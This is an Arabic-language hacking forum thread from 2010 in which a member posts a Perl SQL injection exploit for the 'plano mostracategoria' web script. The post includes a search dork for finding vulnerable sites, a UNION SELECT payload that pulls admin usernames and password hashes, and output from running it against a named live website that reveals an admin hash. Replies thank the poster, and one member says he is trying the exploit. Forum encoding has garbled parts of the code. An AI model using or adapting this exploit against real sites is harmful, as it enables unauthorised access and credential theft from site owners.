التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام



العودة   :: vBspiders Professional Network :: > [ ::. الـقرصـنـة والأختراق ~ The Hidden World Of Hackers .:: ] > SQL قواعد البيانات

إضافة رد
 
LinkBack أدوات الموضوع انواع عرض الموضوع
قديم 09-13-2010, 11:27 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي ثغره بسيطه بسكربت استضافه plano mostracategoria (id) Remote SQL Injection Vulnerability


كود PHP:


#!/usr/bin/perl -w
# plano mostracategoria (id) Remote SQL Injection Vulnerability
# Author    : kalashnikov
# Site      : http://kalashnikov-team.com + http://vbspiders.com
# Group     : KaLa$nikoV t34m
# Date      : {13-9-2010}
# Software  : plano_mostracategoria
# Greetz    : Madjix,ViRuS_HaCkErS,his0k4,el$b7 elmr7,sec4ever,red virus,hassan81,claw,RiSkY,data$hack,Cr3W-Dz,Antivirus7,El3ctr0-dz
# team      : VoLc4n0 --=-- stone love --=-- fla$h
print "|----------------------------------------------------|\n";
print 
"|  plano mostracategoria Remote SQL Injector'        |\n";
print 
"| Coded by : kalashnikov                             |\n";
print 
"| Dork     : inurl:plano_mostracategoria             |\n";
print 
"|                                                    |\n";
print 
"| admin cp : /login.php or /vadmin                   |\n";
print 
"|                  kalashnikov team                  |\n";
print 
"|----------------------------------------------------|\n";
use 
LWP::UserAgent;
print 
"\nMasukin Target:***91;http://wwww.target.com/path/***93;: ";
chomp(my $target=<STDIN>);
#Nama Column
$concatenation="concat(uname,char(58),passwd)volc4n0";
#Nama Table
$table="authuser";
$injection="-7+union+select+";
$b LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host $target "plano_index.php?paginas=plano_mostracategoria&cat_id=".$injection."+".$concatenation.",1,2,3,4,5,6,7+from/**/".$table."+--+";
$res $b->request(HTTP::Request->new(GET=>$host));
$answer $res->content; if ($answer =~/(***91;0-9a-fA-F***93;{32})/){
print 
"\n***91;+***93; Admin Hash : $1\n";
print 
"***91;+***93; Success !! Check target for details...\n";
print 
"\n";
print 
"Attention:\n";
print 
"VoLc4n0 palestine hacker\n";
print 
" !!\n";
print 
"\n";
}
else{print 
"\n***91;-***93; wah gagal bro (Belom Cebok tangan lo)...\n";
print 
"\n";
print 
"\n";
print 
"localhost/plano_index.php?paginas=plano_mostracategoria&cat_id=-7+union+select+@@version,2,3,4,5,6,7,8--\n";

لسا الليله بنزل الثغره بمواقع السكيورتي
يالله توصلكم قبل الكل :D



وهي تطبيق ع احد المواقع

كود:
root@bt:~# perl sql.pl
Possible unintended interpolation of @version in string at sql.pl line 42.
Name "main::version" used only once: possible typo at sql.pl line 42.
|----------------------------------------------------|
|   plano   mostracategoria   Remote  SQL Injector'        |
| Coded by : kalashnikov                             |
| Dork     : inurl:plano_mostracategoria             |
|                                                    |
| admin cp : /login.php or /vadmin                   |
|                  kalashnikov team                  |
|----------------------------------------------------|

Masukin Target:[http://wwww.target.com/path/]: http://www.dkweb.com.br/

[+] Admin Hash : d9e64fe43692c1449a70e4b57770cc4d
[+] Success !! Check target for details...

Attention:
VoLc4n0 palestine hacker
 !!

root@bt:~#
موفقين
smilies11


هي رابط الثغره لسبب عطل بالكود اعلاه (تشفير اكواد من المنتدى )
http://inj3ct0r.com/exploits/14078


eyvi fsd'i fs;vfj hsjqhti plano mostracategoria (id) Remote SQL Injection Vulnerability

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 


التعديل الأخير تم بواسطة KaLa$nikoV ; 09-14-2010 الساعة 11:55 PM.

   

رد مع اقتباس
قديم 09-13-2010, 11:29 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


الشباب الي ما ذكرت اسمهم يعذروني من كثر الاصحاب ما عاد في وسعه :$

بثغرات ثانيه بتوسعكم عيونا باذن الله

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
قديم 09-13-2010, 11:35 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية RiskY
 

 

 
إحصائية العضو





RiskY غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى RiskY

 

 

إحصائية الترشيح

عدد النقاط : 10
RiskY is on a distinguished road

افتراضي


وحــــــــــ$ـــــش واصل .... الاكتشافات .... ومشكور على ال Greetings

   

رد مع اقتباس
قديم 09-14-2010, 12:10 AM   رقم المشاركة : 4 (permalink)
معلومات العضو
 
إحصائية العضو







عبد الله ر غير متواجد حالياً

إرسال رسالة عبر MSN إلى عبد الله ر

 

 

إحصائية الترشيح

عدد النقاط : 10
عبد الله ر is on a distinguished road

افتراضي


الله يعطيك العافية اخي فولكانو
ان شاء الله منها للاحسن باذن الله

التوقيع

سبحان الله وبحمده سبحان الله العظيم
في الطريق الى الاحتراف
باذن الله
أن تكون سوريا" يعني أن تكون أسدا" تحيط به الضباع

 

   

رد مع اقتباس
قديم 09-14-2010, 12:39 AM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو








Master vbspiders غير متواجد حالياً

إرسال رسالة عبر Yahoo إلى Master vbspiders

 

 

إحصائية الترشيح

عدد النقاط : 10
Master vbspiders is on a distinguished road

افتراضي


[align=center]تسلم عالثغرة
جاري التجربة
بارك الله فيك...
تحياتي
[/align]

التوقيع

^_^



 

   

رد مع اقتباس
قديم 09-14-2010, 12:48 AM   رقم المشاركة : 6 (permalink)
معلومات العضو
SoLiTair4Ever
::. Moderators .::
 
الصورة الرمزية SoLiTair4Ever
 

 

 
إحصائية العضو









SoLiTair4Ever غير متواجد حالياً

إرسال رسالة عبر MSN إلى SoLiTair4Ever إرسال رسالة عبر Skype إلى SoLiTair4Ever

 

 

إحصائية الترشيح

عدد النقاط : 14
SoLiTair4Ever is on a distinguished road

افتراضي


بارك الله فيك

التوقيع

.
..
...

.:: قـوانـين الـشبكة العـامة ::.
......
.:: قسـم التبلــيغ عن المواضيـع الملغومـة ::.
......
هــــآم جدآآآ

يمنع منعاً باتاً
رفع الملفات على المواقع التالية:
Ge.tt - mediafire.com - 4shared.com

الأدارة وطاقم فريق العمل لايتحملون اي مسؤلية عن مصير الموضوع عند مخالفة القوانين


...
..
.

 

   

رد مع اقتباس
قديم 09-14-2010, 05:54 PM   رقم المشاركة : 7 (permalink)
معلومات العضو
 
إحصائية العضو





michel scofeld غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
michel scofeld is on a distinguished road

افتراضي


[align=center]حبيبي فآلكانو .. في أكوآد مانعها المنتدى ..
ياليت ترفق لنا الثغره بمستند

[/align]

   

رد مع اقتباس
قديم 09-14-2010, 11:55 PM   رقم المشاركة : 8 (permalink)
معلومات العضو
KaLa$nikoV
VBSPIDERS TEAM

#~VoLc4n0~#

 
الصورة الرمزية KaLa$nikoV
 

 

 
إحصائية العضو







KaLa$nikoV غير متواجد حالياً

إرسال رسالة عبر MSN إلى KaLa$nikoV

 

 

إحصائية الترشيح

عدد النقاط : 11
KaLa$nikoV is on a distinguished road

افتراضي


^^
تفضل حبيبي رابط الثغره
http://inj3ct0r.com/exploits/14078

التوقيع



هل سأعود يوما
ام هي نهايه الطريق !!
إلهيْ ’ / أبدل عُسَرِنا يسُراً


لا تنسونا من دعائكم







سبحان الله والحمدلله ولا اله الا الله والله اكبر
fb.com/groups/VoLc4n0/
volc4n0@hotmail.com

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)


تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع


الساعة الآن 11:30 PM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0